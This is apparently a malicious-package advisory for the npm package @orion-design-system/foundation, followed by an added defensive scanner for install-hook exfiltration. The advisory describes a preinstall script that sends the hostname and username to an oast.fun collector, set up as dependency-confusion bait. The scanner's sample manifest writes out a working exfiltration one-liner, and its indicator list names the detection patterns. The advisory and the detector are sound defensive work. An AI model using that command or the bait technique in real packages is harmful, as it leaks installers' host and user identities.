MAL-2026-5523
Malicious code in @orion-design-system/foundation (npm)
Details
## Source: amazon-inspector (8f8221eb2d51c14500cfc2ca44338fad4d4ec785310189059637c5f1a879517f)

package.json declares a preinstall script that runs `node -e` to read `os.hostname()` and `os.userInfo().username` and send them via HTTPS GET to `https://d8kn5vlt5p5h1j34mbcgbx1nffwjobfoh.oast.fun/?h=<host>&u=<user>` (an interactsh out-of-band collector), with an additional DNS lookup encoding the hostname against the same controlled domain. The script fires automatically on `npm install`, before any user code runs. The package is published at version 9999.0.0 under the @orion-design-system scope and self-describes as a 'Security research - dependency confusion PoC', the canonical Birsan-style shape for hijacking internal package names from public-registry resolution. Any installer whose resolver picks up this public package instead of an intended private @orion-design-system/foundation will leak host and user identifiers to the attacker-controlled OOB domain. Whether or not a specific target authorized the test, every other installer that resolves this name is harmed identically.
## Source: ossf-package-analysis (9a64f6bdb5211b25baf8dbdc18c5d6ab23aac374b09f5158a1a0316701d208c4)

The OpenSSF Package Analysis project identified '@orion-design-system/foundation' @ 9999.0.4 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
Affected packages
No fixed version published yet for @orion-design-system/foundation (npm). Pin to a known-safe version or switch to an alternative.
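A defender-side check for the manifest shape described above, added here as an example and not code from the advisory or the package: it scans a package.json for install-time lifecycle scripts carrying the inline-eval, host/user enumeration, outbound-call and collector-domain indicators, and separately flags the placeholder-high version that marks dependency-confusion bait. The sample manifests, the collector hostname placeholder and the version threshold are constructed assumptions.

```javascript
// Added example (not the advisory's or the package's code): flag npm manifests whose
// install-time lifecycle scripts show the host/user exfiltration shape described above.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicator patterns: inline node eval, host/user enumeration, outbound HTTP/DNS use,
// and the interactsh collector domain named in the advisory (list is illustrative).
const INDICATORS = [
  { name: 'inline-node-eval', re: /\bnode\s+(?:-e|--eval)\b/ },
  { name: 'host-user-enum', re: /os\.(?:hostname|userInfo)\s*\(/ },
  { name: 'outbound-call', re: /require\(['"](?:https?|dns|net)['"]\)|\bfetch\s*\(|\b(?:curl|wget)\b/ },
  { name: 'oob-collector-domain', re: /\boast\.fun\b/i },
];

// Returns one finding per lifecycle hook whose command matches at least one indicator.
function scanManifest(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const hits = INDICATORS.filter((i) => i.re.test(cmd)).map((i) => i.name);
    if (hits.length > 0) findings.push({ hook, indicators: hits });
  }
  return findings;
}

// A very high major version on a scoped name is the dependency-confusion bait shape
// (public copy outranking the private one); the threshold is an assumption.
function looksLikeConfusionBait(manifest, majorThreshold = 1000) {
  const major = Number.parseInt(String(manifest.version || '0').split('.')[0], 10);
  return Number.isFinite(major) && major >= majorThreshold;
}

// Constructed sample manifests (not the real package contents). The collector host
// is a placeholder; only its suffix mirrors the advisory.
const SUSPICIOUS_MANIFEST = {
  name: '@orion-design-system/foundation',
  version: '9999.0.0',
  scripts: {
    preinstall: "node -e \"const os=require('os');require('https').get('https://PLACEHOLDER.oast.fun/?h='+os.hostname()+'&u='+os.userInfo().username)\"",
  },
};
const BENIGN_MANIFEST = {
  name: '@example/widget',
  version: '1.4.2',
  scripts: { build: 'tsc -p .', test: 'node --test' },
};

console.log(JSON.stringify(scanManifest(SUSPICIOUS_MANIFEST), null, 2));
console.log('confusion bait:', looksLikeConfusionBait(SUSPICIOUS_MANIFEST));
```

Run it over every `node_modules/*/package.json` (and the lockfile's resolved registry URLs for scoped names) to catch the same shape before an install hook has a chance to fire.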